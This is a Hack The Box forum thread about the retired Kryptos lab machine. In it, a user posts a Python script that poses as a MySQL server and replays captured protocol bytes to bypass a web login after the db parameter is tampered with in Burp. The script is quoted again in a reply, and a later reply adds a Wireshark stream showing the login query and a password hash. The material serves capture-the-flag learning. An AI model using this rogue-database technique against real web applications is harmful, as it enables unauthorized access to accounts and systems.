Use the script as a particular MySQL server to bypass Kryptos login

edited September 2019 in Exploits

Kryptos retired and I didn't get user,stuck at the encrypt part.
Thanks for @limbernie & @n1b1ru 's help.I request,both of you response.But I couldn't solve it eventually.Well,I'm C136Rick,not @0xRick (you know what I mean) :p.
And Thanks @no0ne & @Adamm for making it,I like it.

Here is what I did.Just copied the MySQL response to the program by analyzing captured network data of MySQL using Wireshark.When that request's parameter(db) was set and done in burp,ran the program and I got 302,which means it worked.

import socket
import logging
logging.basicConfig(level=logging.DEBUG)

if __name__ == '__main__':

    sock = socket.socket()
    sock.bind(("0.0.0.0", 3306))
    sock.listen(5)

    con, addr = sock.accept()

    logging.info('Connnect from: %r', addr)
    # Wireshark Info: Server Greeting proto=10 version=5.5.53
    con.sendall("\x4a\x00\x00\x00\x0a\x35\x2e\x35\x2e\x35\x33\x00\x17\x00\x00\x00\x6e\x7a\x3b\x54\x76\x73\x61\x6a\x00\xff\xf7\x21\x02\x00\x0f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x76\x21\x3d\x50\x5c\x5a\x32\x2a\x7a\x49\x3f\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00")
    con.recv(2048)

    logging.info("Wireshark Info: Login Request user=dbuser db=cryptor")
    # Wireshark Info: Response OK
    con.sendall("\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00")
    con.recv(2048)

    logging.info("Wireshark Info: Request Query")
    # Wireshark Info: Response.
    con.sendall("\x01\x00\x00\x01\x02\x37\x00\x00\x02\x03\x64\x65\x66\x07\x63\x72\x79\x70\x74\x6f\x72\x05\x75\x73\x65\x72\x73\x05\x75\x73\x65\x72\x73\x08\x75\x73\x65\x72\x6e\x61\x6d\x65\x08\x75\x73\x65\x72\x6e\x61\x6d\x65\x0c\x21\x00\x96\x00\x00\x00\xfd\x01\x10\x00\x00\x00\x37\x00\x00\x03\x03\x64\x65\x66\x07\x63\x72\x79\x70\x74\x6f\x72\x05\x75\x73\x65\x72\x73\x05\x75\x73\x65\x72\x73\x08\x70\x61\x73\x73\x77\x6f\x72\x64\x08\x70\x61\x73\x73\x77\x6f\x72\x64\x0c\x21\x00\x96\x00\x00\x00\xfd\x01\x10\x00\x00\x00\x05\x00\x00\x04\xfe\x00\x00\x22\x00\x0e\x00\x00\x05\x06\x64\x62\x75\x73\x65\x72\x06\x64\x62\x75\x73\x65\x72\x05\x00\x00\x06\xfe\x00\x00\x22\x00")
    con.recv(2048)

    logging.info("Wireshark Info: Request Quit")
    logging.info("done!")
    con.close()

Comments

  • Type your comment> @C136Rick said:

    Kryptos retired and I didn't get user,stuck at the encrypt part.
    Thanks for @limbernie & @n1b1ru.I request,both of you response.But I couldn't solve it eventually.Well,I'm C136Rick,not @0xRick (you know what I mean) :p.
    And Thanks @no0ne & @Adamm for making it,I like it.

    Here is what I did.Just copied the MySQL response to the program by analyzing captured network data of MySQL using Wireshark.When that request's parameter(db) was set and done in burp,ran the program and I got 302,which means it worked.

    import socket
    import logging
    logging.basicConfig(level=logging.DEBUG)
    
    if __name__ == '__main__':
    
        sock = socket.socket()
        sock.bind(("0.0.0.0", 3306))
        sock.listen(5)
    
        con, addr = sock.accept()
        
      logging.info('Connnect from: %r', addr)
      # Wireshark Info: Server Greeting proto=10 version=5.5.53
      con.sendall("\x4a\x00\x00\x00\x0a\x35\x2e\x35\x2e\x35\x33\x00\x17\x00\x00\x00\x6e\x7a\x3b\x54\x76\x73\x61\x6a\x00\xff\xf7\x21\x02\x00\x0f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x76\x21\x3d\x50\x5c\x5a\x32\x2a\x7a\x49\x3f\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00")
        con.recv(2048)
    
        logging.info("Wireshark Info: Login Request user=dbuser db=cryptor")
      # Wireshark Info: Response OK
      con.sendall("\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00")
        con.recv(2048)
      
        logging.info("Wireshark Info: Request Query")
      # Wireshark Info: Response.
      con.sendall("\x01\x00\x00\x01\x02\x37\x00\x00\x02\x03\x64\x65\x66\x07\x63\x72\x79\x70\x74\x6f\x72\x05\x75\x73\x65\x72\x73\x05\x75\x73\x65\x72\x73\x08\x75\x73\x65\x72\x6e\x61\x6d\x65\x08\x75\x73\x65\x72\x6e\x61\x6d\x65\x0c\x21\x00\x96\x00\x00\x00\xfd\x01\x10\x00\x00\x00\x37\x00\x00\x03\x03\x64\x65\x66\x07\x63\x72\x79\x70\x74\x6f\x72\x05\x75\x73\x65\x72\x73\x05\x75\x73\x65\x72\x73\x08\x70\x61\x73\x73\x77\x6f\x72\x64\x08\x70\x61\x73\x73\x77\x6f\x72\x64\x0c\x21\x00\x96\x00\x00\x00\xfd\x01\x10\x00\x00\x00\x05\x00\x00\x04\xfe\x00\x00\x22\x00\x0e\x00\x00\x05\x06\x64\x62\x75\x73\x65\x72\x06\x64\x62\x75\x73\x65\x72\x05\x00\x00\x06\xfe\x00\x00\x22\x00")
        con.recv(2048)
      
      logging.info("Wireshark Info: Request Quit")
      logging.info("done!")
        con.close()
    

    ohhh

  • You can still continue to work on it even though Kryptos has retired.

    limbernie
    My write-ups of retired machines | Discord - limbernie#0386

  • edited September 2019

    Type your comment> @limbernie said:

    You can still continue to work on it even though Kryptos has retired.

    Knew it and thanks for response.

  • nice work, i havent done Kryptos, watched ippsec video. Could you comment your code about the hex values ?

    peek

  • Type your comment> @peek said:

    nice work, i havent done Kryptos, watched ippsec video. Could you comment your code about the hex values ?

    It 's all about data of MySQL.
    Here is TCP stream of Wireshark,just ignore "username " and "password".

    J...
    5.5.53.....nz;Tvsaj...!...............pv!=P\Z2*zI?.mysql_native_password.Z...........!.......................dbuser..-!.n.>.s!#..M..?....cryptor.mysql_native_password............m....SELECT username, password FROM users WHERE username='11111' AND password='1bbd886460827015e5d605ed44252251' .....7....def.cryptor.users.users.username.username.!...........7....def.cryptor.users.users.password.password.!.................."......dbuser.dbuser......."......
    
Sign In to comment.